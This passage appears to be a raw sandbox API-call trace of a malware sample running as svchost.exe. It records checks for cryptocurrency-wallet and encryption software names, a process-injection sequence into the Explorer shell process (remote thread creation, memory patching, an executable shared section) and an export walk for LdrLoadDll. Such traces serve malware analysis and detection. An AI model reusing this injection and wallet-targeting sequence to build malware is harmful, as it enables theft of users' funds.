ProcessInformation=0xb0938cf8b0, ReturnLength=0x0) returned 0x0 [0208.051] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96c9b0000, lpBuffer=0xb0938cf970, dwLength=0x30 | out: lpBuffer=0xb0938cf970*(BaseAddress=0x7ff96c9b0000, AllocationBase=0x7ff96c9b0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0208.051] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0xb0938cf8b0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xb0938cf8b0, ReturnLength=0x0) returned 0x0 [0208.052] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff968780000, lpBuffer=0xb0938cf970, dwLength=0x30 | out: lpBuffer=0xb0938cf970*(BaseAddress=0x7ff968780000, AllocationBase=0x7ff968780000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0208.052] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0xb0938cf8b0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xb0938cf8b0, ReturnLength=0x0) returned 0x0 [0208.052] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9755b0000, lpBuffer=0xb0938cf970, dwLength=0x30 | out: lpBuffer=0xb0938cf970*(BaseAddress=0x7ff9755b0000, AllocationBase=0x7ff9755b0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0208.052] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0xb0938cf8b0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xb0938cf8b0, ReturnLength=0x0) returned 0x0 [0208.052] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff973450000, lpBuffer=0xb0938cf970, dwLength=0x30 | out: lpBuffer=0xb0938cf970*(BaseAddress=0x7ff973450000, AllocationBase=0x7ff973450000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0208.052] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0xb0938cf8b0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xb0938cf8b0, ReturnLength=0x0) returned 0x0 [0208.052] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977720000, lpBuffer=0xb0938cf970, dwLength=0x30 | out: lpBuffer=0xb0938cf970*(BaseAddress=0x7ff977720000, AllocationBase=0x7ff977720000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0208.053] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0xb0938cf8b0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xb0938cf8b0, ReturnLength=0x0) returned 0x0 [0208.053] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977200000, lpBuffer=0xb0938cf970, dwLength=0x30 | out: lpBuffer=0xb0938cf970*(BaseAddress=0x7ff977200000, AllocationBase=0x7ff977200000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0208.053] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0xb0938cf8b0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xb0938cf8b0, ReturnLength=0x0) returned 0x0 [0208.053] VirtualProtect (in: lpAddress=0x7ff9772e1820, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0xb0938cf8b0 | out: lpflOldProtect=0xb0938cf8b0*=0x2) returned 1 [0208.053] VirtualProtect (in: lpAddress=0x7ff9772e1820, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0xb0938cf8b0 | out: lpflOldProtect=0xb0938cf8b0*=0x40) returned 1 [0208.054] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff974520000, lpBuffer=0xb0938cf970, dwLength=0x30 | out: lpBuffer=0xb0938cf970*(BaseAddress=0x7ff974520000, AllocationBase=0x7ff974520000, AllocationProtect=0x80, __alignment1=0xffffe000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0208.054] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0xb0938cf8b0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xb0938cf8b0, ReturnLength=0x0) returned 0x0 [0208.054] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977820000, lpBuffer=0xb0938cf970, dwLength=0x30 | out: lpBuffer=0xb0938cf970*(BaseAddress=0x7ff977820000, AllocationBase=0x7ff977820000, AllocationProtect=0x80, __alignment1=0xffffe000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0208.054] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0xb0938cf8b0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xb0938cf8b0, ReturnLength=0x0) returned 0x0 [0208.054] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xb095a03d20, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")) returned 0x1f [0208.054] GetProcAddress (hModule=0x7ff977360000, lpProcName="StrStrIW") returned 0x7ff97736b260 [0208.054] StrStrIW (lpFirst="C:\\Windows\\system32\\svchost.exe", lpSrch="electrum-") returned 0x0 [0208.054] StrStrIW (lpFirst="C:\\Windows\\system32\\svchost.exe", lpSrch="bitcoin") returned 0x0 [0208.054] StrStrIW (lpFirst="C:\\Windows\\system32\\svchost.exe", lpSrch="multibit-hd") returned 0x0 [0208.054] StrStrIW (lpFirst="C:\\Windows\\system32\\svchost.exe", lpSrch="bither") returned 0x0 [0208.054] StrStrIW (lpFirst="C:\\Windows\\system32\\svchost.exe", lpSrch="msigna.") returned 0x0 [0208.054] StrStrIW (lpFirst="C:\\Windows\\system32\\svchost.exe", lpSrch="Jaxx.") returned 0x0 [0208.054] StrStrIW (lpFirst="C:\\Windows\\system32\\svchost.exe", lpSrch="JEdudus.") returned 0x0 [0208.054] StrStrIW (lpFirst="C:\\Windows\\system32\\svchost.exe", lpSrch="armory-") returned 0x0 [0208.054] StrStrIW (lpFirst="C:\\Windows\\system32\\svchost.exe", lpSrch="veracrypt") returned 0x0 [0208.055] StrStrIW (lpFirst="C:\\Windows\\system32\\svchost.exe", lpSrch="truecrypt") returned 0x0 [0208.055] GetProcAddress (hModule=0x7ff9757b0000, lpProcName="GetShellWindow") returned 0x7ff9757d4060 [0208.055] GetShellWindow () returned 0x100dc [0208.055] GetProcAddress (hModule=0x7ff9757b0000, lpProcName="GetWindowThreadProcessId") returned 0x7ff9757c4040 [0208.055] GetWindowThreadProcessId (in: hWnd=0x100dc, lpdwProcessId=0xb0938cf9c0 | out: lpdwProcessId=0xb0938cf9c0) returned 0x838 [0208.055] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x834) returned 0x1a0 [0208.055] IsWow64Process (in: hProcess=0x1a0, Wow64Process=0xb0938cf930 | out: Wow64Process=0xb0938cf930) returned 1 [0208.055] GetModuleHandleA (lpModuleName="NTDLL.DLL") returned 0x7ff977f30000 [0208.055] GetProcAddress (hModule=0x7ff977f30000, lpProcName="RtlExitUserThread") returned 0x7ff977f39fa0 [0208.055] CreateRemoteThread (in: hProcess=0x1a0, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x7ff977f39fa0, lpParameter=0x0, dwCreationFlags=0x4, lpThreadId=0xb0938cf974 | out: lpThreadId=0xb0938cf974*=0xb40) returned 0x1a4 [0208.060] IsWow64Process (in: hProcess=0x1a0, Wow64Process=0xb0938cf3e0 | out: Wow64Process=0xb0938cf3e0) returned 1 [0208.060] NtReadVirtualMemory (in: ProcessHandle=0x1a0, BaseAddress=0x7ff977f39fa0, Buffer=0xb0938cf938, NumberOfBytesToRead=0x4, NumberOfBytesRead=0xb0938cf400 | out: Buffer=0xb0938cf938*, NumberOfBytesRead=0xb0938cf400*=0x4) returned 0x0 [0208.060] VirtualProtectEx (in: hProcess=0x1a0, lpAddress=0x7ff977f39fa0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0xb0938cf930 | out: lpflOldProtect=0xb0938cf930*=0x20) returned 1 [0208.060] NtWriteVirtualMemory (in: ProcessHandle=0x1a0, BaseAddress=0x7ff977f39fa0, Buffer=0xb0938cf928*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0xb0938cf3b0 | out: Buffer=0xb0938cf928*, NumberOfBytesWritten=0xb0938cf3b0*=0x4) returned 0x0 [0208.449] VirtualProtectEx (in: hProcess=0x1a0, lpAddress=0x7ff977f39fa0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0xb0938cf930 | out: lpflOldProtect=0xb0938cf930*=0x40) returned 1 [0208.450] ResumeThread (hThread=0x1a4) returned 0x1 [0208.554] Sleep (dwMilliseconds=0x64) [0208.664] SuspendThread (hThread=0x1a4) returned 0x0 [0208.665] NtGetContextThread (in: ThreadHandle=0x1a4, Context=0xb0938cf410 | out: Context=0xb0938cf410*(P1Home=0x0, P2Home=0x0, P3Home=0x0, P4Home=0x0, P5Home=0x0, P6Home=0x0, ContextFlags=0x10000b, MxCsr=0x1f80, SegCs=0x33, SegDs=0x0, SegEs=0x0, SegFs=0x0, SegGs=0x0, SegSs=0x2b, EFlags=0x247, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, Rax=0xfff2efe73f4, Rcx=0x0, Rdx=0x10004000000000, Rbx=0x7ff977f39fa0, Rsp=0x235f898, Rbp=0x0, Rsi=0x0, Rdi=0x0, R8=0x0, R9=0x0, R10=0x0, R11=0x0, R12=0x0, R13=0x0, R14=0x0, R15=0x0, Rip=0x7ff977f39fa0, FltSave.ControlWord=0x27f, FltSave.StatusWord=0x0, FltSave.TagWord=0x0, FltSave.Reserved1=0x0, FltSave.ErrorOpcode=0x0, FltSave.ErrorOffset=0x0, FltSave.ErrorSelector=0x0, FltSave.Reserved2=0x0, FltSave.DataOffset=0x0, FltSave.DataSelector=0x0, FltSave.Reserved3=0x0, FltSave.MxCsr=0x1f80, FltSave.MxCsr_Mask=0xffff, FltSave.FloatRegisters.Low=0x0, FltSave.FloatRegisters.High=0x0, FltSave.XmmRegisters.Low=0x0, FltSave.XmmRegisters.High=0x0, FltSave.Reserved4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0xa8, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x98, [137]=0x76, [138]=0x77, [139]=0xce, [140]=0x0, [141]=0xd0, [142]=0xff, [143]=0xff, [144]=0x40, [145]=0x98, [146]=0x2b, [147]=0x2c, [148]=0x0, [149]=0xe0, [150]=0xff, [151]=0xff, [152]=0x40, [153]=0xc0, [154]=0xd9, [155]=0x29, [156]=0x0, [157]=0xe0, [158]=0xff, [159]=0xff, [160]=0x40, [161]=0x90, [162]=0x90, [163]=0x2b, [164]=0x0, [165]=0xe0, [166]=0xff, [167]=0xff, [168]=0x70, [169]=0x30, [170]=0x1, [171]=0x27, [172]=0x3, [173]=0xf8, [174]=0xff, [175]=0xff, [176]=0x91, [177]=0xb7, [178]=0x57, [179]=0x85, [180]=0x35, [181]=0xc7, [182]=0xff, [183]=0xff, [184]=0x90, [185]=0x7b, [186]=0x77, [187]=0xce, [188]=0x0, [189]=0xd0, [190]=0xff, [191]=0xff), FltSave.StackControl=([0]=0x257ef180, [1]=0xfffff803, [2]=0x2, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x2c2b9840), FltSave.Cr0NpxState=0xffffe000, Header.Low=0x27f, Header.High=0x0, Legacy.Low=0x0, Legacy.High=0x0, Xmm0.Low=0x0, Xmm0.High=0x0, Xmm1.Low=0x0, Xmm1.High=0x0, Xmm2.Low=0x0, Xmm2.High=0x0, Xmm3.Low=0x0, Xmm3.High=0x0, Xmm4.Low=0x0, Xmm4.High=0x0, Xmm5.Low=0x0, Xmm5.High=0x0, Xmm6.Low=0x0, Xmm6.High=0x0, Xmm7.Low=0x0, Xmm7.High=0x0, Xmm8.Low=0x0, Xmm8.High=0x0, Xmm9.Low=0x0, Xmm9.High=0x0, Xmm10.Low=0x0, Xmm10.High=0x0, Xmm11.Low=0x0, Xmm11.High=0x0, Xmm12.Low=0x0, Xmm12.High=0x0, Xmm13.Low=0x0, Xmm13.High=0x0, Xmm14.Low=0x0, Xmm14.High=0x0, Xmm15.Low=0x0, Xmm15.High=0x0, VectorRegister.Low=0x0, VectorRegister.High=0x0, VectorControl=0x0, DebugControl=0x0, LastBranchToRip=0x0, LastBranchFromRip=0x0, LastExceptionToRip=0x0, LastExceptionFromRip=0x0)) returned 0x0 [0208.665] RtlNtStatusToDosError (Status=0x0) returned 0x0 [0208.665] NtCreateSection (in: SectionHandle=0xb0938cf310, DesiredAccess=0xf001f, ObjectAttributes=0xb0938cf350*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), MaximumSize=0xb0938cf320, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xb0938cf310*=0x1a8) returned 0x0 [0208.665] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0xffffffffffffffff, BaseAddress=0xb0938cf318*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0xb0938cf2d8*=0, ViewSize=0xb0938cf2a0*=0x0, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xb0938cf318*=0xb095520000, SectionOffset=0xb0938cf2d8*=0, ViewSize=0xb0938cf2a0*=0x133000) returned 0x0 [0208.666] RtlNtStatusToDosError (Status=0x0) returned 0x0 [0208.673] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0x1a0, BaseAddress=0xb0938cf300*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0xb0938cf2d8*=0, ViewSize=0xb0938cf2a0*=0x0, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xb0938cf300*=0x7490000, SectionOffset=0xb0938cf2d8*=0, ViewSize=0xb0938cf2a0*=0x133000) returned 0x0 [0208.674] RtlNtStatusToDosError (Status=0x0) returned 0x0 [0208.679] GetModuleHandleA (lpModuleName="NTDLL.DLL") returned 0x7ff977f30000 [0208.679] GetModuleFileNameA (in: hModule=0x7ff977f30000, lpFilename=0xb095a03f40, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0208.679] lstrcmpA (lpString1="A_SHAFinal", lpString2="LdrLoadDll") returned -1 [0208.679] lstrcmpA (lpString1="A_SHAInit", lpString2="LdrLoadDll") returned -1 [0208.679] lstrcmpA (lpString1="A_SHAUpdate", lpString2="LdrLoadDll") returned -1 [0208.679] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="LdrLoadDll") returned -1 [0208.679] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="LdrLoadDll") returned -1 [0208.679] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="LdrLoadDll") returned -1 [0208.679] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="LdrLoadDll") returned -1 [0208.679] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="LdrLoadDll") returned -1 [0208.679] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="LdrLoadDll") returned -1 [0208.679] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="LdrLoadDll") returned -1 [0208.679] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="LdrLoadDll") returned -1 [0208.679] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="LdrLoadDll") returned -1 [0208.679] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="LdrLoadDll") returned -1 [0208.680] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="LdrLoadDll") returned -1 [0208.680] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="LdrLoadDll") returned -1 [0208.680] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="LdrLoadDll") returned -1 [0208.680] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="LdrLoadDll") returned -1 [0208.680] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="LdrLoadDll") returned -1 [0208.680] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="LdrLoadDll") returned -1 [0208.680] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="LdrLoadDll") returned -1 [0208.680] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="LdrLoadDll") returned -1 [0208.680] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="LdrLoadDll") returned -1 [0208.680] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="LdrLoadDll") returned -1 [0208.680] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="LdrLoadDll") returned -1 [0208.680] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="LdrLoadDll") returned -1 [0208.680] lstrcmpA (lpString1="CsrClientCallServer", lpString2="LdrLoadDll") returned -1 [0208.680] lstrcmpA (lpString1="CsrClientConnectToServer", lpString2="LdrLoadDll") returned -1 [0208.680] lstrcmpA (lpString1="CsrFreeCaptureBuffer", lpString2="LdrLoadDll") returned -1 [0208.680] lstrcmpA (lpString1="CsrGetProcessId", lpString2="LdrLoadDll") returned -1 [0208.680] lstrcmpA (lpString1="CsrIdentifyAlertableThread", lpString2="LdrLoadDll") returned -1 [0208.680] lstrcmpA (lpString1="CsrSetPriorityClass", lpString2="LdrLoadDll") returned -1 [0208.680] lstrcmpA (lpString1="CsrVerifyRegion", lpString2="LdrLoadDll") returned -1 [0208.680] lstrcmpA (lpString1="DbgBreakPoint", lpString2="LdrLoadDll") returned -1 [0208.680] lstrcmpA (lpString1="DbgPrint", lpString2="LdrLoadDll") returned -1 [0208.680] lstrcmpA (lpString1="DbgPrintEx", lpString2="LdrLoadDll") returned -1 [0208.680] lstrcmpA (lpString1="DbgPrintReturnControlC", lpString2="LdrLoadDll") returned -1 [0208.680] lstrcmpA (lpString1="DbgPrompt", lpString2="LdrLoadDll") returned -1 [0208.680] lstrcmpA (lpString1="DbgQueryDebugFilterState", lpString2="LdrLoadDll") returned -1 [0208.680] lstrcmpA (lpString1="DbgSetDebugFilterState", lpString2="LdrLoadDll") returned -1 [0208.680] lstrcmpA (lpString1="DbgUiConnectToDbg", lpString2="LdrLoadDll") returned -1 [0208.680] lstrcmpA (lpString1="DbgUiContinue", lpString2="LdrLoadDll") returned -1 [0208.680] lstrcmpA (lpString1="DbgUiConvertStateChangeStructure", lpString2="LdrLoadDll") returned -1 [0208.680] lstrcmpA (lpString1="DbgUiConvertStateChangeStructureEx", lpString2="LdrLoadDll") returned -1 [0208.680] lstrcmpA (lpString1="DbgUiDebugActiveProcess", lpString2="LdrLoadDll") returned -1 [0208.680] lstrcmpA (lpString1="DbgUiGetThreadDebugObject", lpString2="LdrLoadDll") returned -1 [0208.680] lstrcmpA (lpString1="DbgUiIssueRemoteBreakin", lpString2="LdrLoadDll") returned -1 [0208.680] lstrcmpA (lpString1="DbgUiRemoteBreakin", lpString2="LdrLoadDll") returned -1 [0208.680] lstrcmpA (lpString1="DbgUiSetThreadDebugObject", lpString2="LdrLoadDll") returned -1 [0208.680] lstrcmpA (lpString1="DbgUiStopDebugging", lpString2="LdrLoadDll") returned -1 [0208.680] lstrcmpA (lpString1="DbgUiWaitStateChange", lpString2="LdrLoadDll") returned -1 [0208.680] lstrcmpA (lpString1="DbgUserBreakPoint", lpString2="LdrLoadDll") returned -1 [0208.681] lstrcmpA (lpString1="EtwCreateTraceInstanceId", lpString2="LdrLoadDll") returned -1 [0208.681] lstrcmpA (lpString1="EtwDeliverDataBlock", lpString2="LdrLoadDll") returned -1 [0208.681] lstrcmpA (lpString1="EtwEnumerateProcessRegGuids", lpString2="LdrLoadDll") returned -1 [0208.681] lstrcmpA (lpString1="EtwEventActivityIdControl", lpString2="LdrLoadDll") returned -1 [0208.681] lstrcmpA (lpString1="EtwEventEnabled", lpString2="LdrLoadDll") returned -1 [0208.681] lstrcmpA (lpString1="EtwEventProviderEnabled", lpString2="LdrLoadDll") returned -1 [0208.681] lstrcmpA (lpString1="EtwEventRegister", lpString2="LdrLoadDll") returned -1 [0208.681] lstrcmpA (lpString1="EtwEventSetInformation", lpString2="LdrLoadDll") returned -1 [0208.681] lstrcmpA (lpString1="EtwEventUnregister", lpString2="LdrLoadDll") returned -1 [0208.681] lstrcmpA (lpString1="EtwEventWrite", lpString2="LdrLoadDll") returned -1 [0208.681] lstrcmpA (lpString1="EtwEventWriteEndScenario", lpString2="LdrLoadDll") returned -1 [0208.681] lstrcmpA (lpString1="EtwEventWriteEx", lpString2="LdrLoadDll") returned -1 [0208.681] lstrcmpA (lpString1="EtwEventWriteFull", lpString2="LdrLoadDll") returned -1 [0208.681] lstrcmpA (lpString1="EtwEventWriteNoRegistration", lpString2="LdrLoadDll") returned -1 [0208.681] lstrcmpA (lpString1="EtwEventWriteStartScenario", lpString2="LdrLoadDll") returned -1 [0208.681] lstrcmpA (lpString1="EtwEventWriteString", lpString2="LdrLoadDll") returned -1 [0208.681] lstrcmpA (lpString1="EtwEventWriteTransfer", lpString2="LdrLoadDll") returned -1 [0208.681] lstrcmpA (lpString1="EtwGetTraceEnableFlags", lpString2="LdrLoadDll") returned -1 [0208.681] lstrcmpA (lpString1="EtwGetTraceEnableLevel", lpString2="LdrLoadDll") returned -1 [0208.681] lstrcmpA (lpString1="EtwGetTraceLoggerHandle", lpString2="LdrLoadDll") returned -1 [0208.681] lstrcmpA (lpString1="EtwLogTraceEvent", lpString2="LdrLoadDll") returned -1 [0208.681] lstrcmpA (lpString1="EtwNotificationRegister", lpString2="LdrLoadDll") returned -1 [0208.681] lstrcmpA (lpString1="EtwNotificationUnregister", lpString2="LdrLoadDll") returned -1 [0208.681] lstrcmpA (lpString1="EtwProcessPrivateLoggerRequest", lpString2="LdrLoadDll") returned -1 [0208.681] lstrcmpA (lpString1="EtwRegisterSecurityProvider", lpString2="LdrLoadDll") returned -1 [0208.681] lstrcmpA (lpString1="EtwRegisterTraceGuidsA", lpString2="LdrLoadDll") returned -1 [0208.681] lstrcmpA (lpString1="EtwRegisterTraceGuidsW", lpString2="LdrLoadDll") returned -1 [0208.681] lstrcmpA (lpString1="EtwReplyNotification", lpString2="LdrLoadDll") returned -1 [0208.681] lstrcmpA (lpString1="EtwSendNotification", lpString2="LdrLoadDll") returned -1 [0208.681] lstrcmpA (lpString1="EtwSetMark", lpString2="LdrLoadDll") returned -1 [0208.681] lstrcmpA (lpString1="EtwTraceEventInstance", lpString2="LdrLoadDll") returned -1 [0208.681] lstrcmpA (lpString1="EtwTraceMessage", lpString2="LdrLoadDll") returned -1 [0208.681] lstrcmpA (lpString1="EtwTraceMessageVa", lpString2="LdrLoadDll") returned -1 [0208.681] lstrcmpA (lpString1="EtwUnregisterTraceGuids", lpString2="LdrLoadDll") returned -1 [0208.681] lstrcmpA (lpString1="EtwWriteUMSecurityEvent", lpString2="LdrLoadDll") returned -1 [0208.681] lstrcmpA (lpString1="EtwpCreateEtwThread", lpString2="LdrLoadDll") returned -1 [0208.681] lstrcmpA (lpString1="EtwpGetCpuSpeed", lpString2="LdrLoadDll") returned -1 [0208.682] lstrcmpA (lpString1="EvtIntReportAuthzEventAndSourceAsync", lpString2="LdrLoadDll") returned -1 [0208.682] lstrcmpA (lpString1="EvtIntReportEventAndSourceAsync", lpString2="LdrLoadDll") returned -1 [0208.682] lstrcmpA (lpString1="ExpInterlockedPopEntrySListEnd", lpString2="LdrLoadDll") returned -1 [0208.682] lstrcmpA (lpString1="ExpInterlockedPopEntrySListFault", lpString2="LdrLoadDll") returned -1 [0208.682] lstrcmpA (lpString1="ExpInterlockedPopEntrySListResume", lpString2="LdrLoadDll") returned -1 [0208.682] lstrcmpA (lpString1="KiRaiseUserExceptionDispatcher", lpString2="LdrLoadDll") returned -1 [0208.682] lstrcmpA (lpString1="KiUserApcDispatcher", lpString2="LdrLoadDll") returned -1 [0208.682] lstrcmpA (lpString1="KiUserCallbackDispatcher", lpString2="LdrLoadDll") returned -1 [0208.682] lstrcmpA (lpString1="KiUserExceptionDispatcher", lpString2="LdrLoadDll") returned -1 [0208.682] lstrcmpA (lpString1="KiUserInvertedFunctionTable", lpString2="LdrLoadDll") returned -1 [0208.682] lstrcmpA (lpString1="LdrAccessResource", lpString2="LdrLoadDll") returned -1 [0208.682] lstrcmpA (lpString1="LdrAddDllDirectory", lpString2="LdrLoadDll") returned -1 [0208.682] lstrcmpA (lpString1="LdrAddLoadAsDataTable", lpString2="LdrLoadDll") returned -1 [0208.682] lstrcmpA (lpString1="LdrAddRefDll", lpString2="LdrLoadDll") returned -1 [0208.682] lstrcmpA (lpString1="LdrAppxHandleIntegrityFailure", lpString2="LdrLoadDll") returned -1 [0208.682] lstrcmpA (lpString1="LdrDisableThreadCalloutsForDll", lpString2="LdrLoadDll") returned -1 [0208.682] lstrcmpA (lpString1="LdrEnumResources", lpString2="LdrLoadDll") returned -1 [0208.682] lstrcmpA (lpString1="LdrEnumerateLoadedModules", lpString2="LdrLoadDll") returned -1 [0208.682] lstrcmpA (lpString1="LdrFastFailInLoaderCallout", lpString2="LdrLoadDll") returned -1 [0208.682] lstrcmpA (lpString1="LdrFindEntryForAddress", lpString2="LdrLoadDll") returned -1 [0208.682] lstrcmpA (lpString1="LdrFindResourceDirectory_U", lpString2="LdrLoadDll") returned -1 [0208.682] lstrcmpA (lpString1="LdrFindResourceEx_U", lpString2="LdrLoadDll") returned -1 [0208.682] lstrcmpA (lpString1="LdrFindResource_U", lpString2="LdrLoadDll") returned -1 [0208.682] lstrcmpA (lpString1="LdrFlushAlternateResourceModules", lpString2="LdrLoadDll") returned -1 [0208.682] lstrcmpA (lpString1="LdrGetDllDirectory", lpString2="LdrLoadDll") returned -1 [0208.682] lstrcmpA (lpString1="LdrGetDllFullName", lpString2="LdrLoadDll") returned -1 [0208.682] lstrcmpA (lpString1="LdrGetDllHandle", lpString2="LdrLoadDll") returned -1 [0208.682] lstrcmpA (lpString1="LdrGetDllHandleByMapping", lpString2="LdrLoadDll") returned -1 [0208.682] lstrcmpA (lpString1="LdrGetDllHandleByName", 